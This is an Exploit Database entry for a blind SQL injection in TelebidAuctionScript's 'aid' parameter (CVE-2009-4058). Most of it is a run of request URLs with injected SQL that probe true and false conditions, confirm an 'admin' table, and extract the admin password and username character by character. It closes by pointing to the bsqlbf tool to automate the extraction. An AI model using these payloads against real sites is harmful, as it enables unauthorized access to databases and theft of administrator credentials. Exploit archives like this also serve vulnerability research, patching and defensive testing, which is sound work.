Exploit Database - Logo

TelebidAuctionScript - 'aid' Blind SQL Injection

EDB-ID: 10165 Author: Hussin X Published: 2009-11-17
CVE: CVE-2009-4058 Type: Webapps Platform: PHP
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
TelebidauctionScript(aid) Blind SQL Injection Vulnerability
____________________________________

Author : Hussin X

Home : www.IQ-TY.com

email : darkangel_g85@Yahoo.com

____________________________________

Vendor : http://www.telebidauctionscript.com/

Demo :
_______


http://server/allauctions.php?aid=2+and+1=1 (true)


http://server/allauctions.php?aid=2+and+1=0 (false )


:: Table ::

http://server/allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1


:: column pass and username ::

http://server/allauctions.php?aid=2+and+(SELECT+substring(concat(1,pass),1,1)+from+admin+limit 0,1)=1

http://server/allauctions.php?aid=2 and (SELECT+substring(concat(1,username),1,1) from admin limit 0,1)=1

note : Use the "bsqlbf" to write detailed information

Greetz
WwW.IQ-ty.CoM , Tryag.cc

| CraCkEr | Cyber-Zone | str0ke | jiko
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (1): CVE-2009-4058
Trying to match OSVDBs (1): 60307
Other Possible E-DB Search Terms: TelebidAuctionScript
Date D V Title Author
No matches
Menu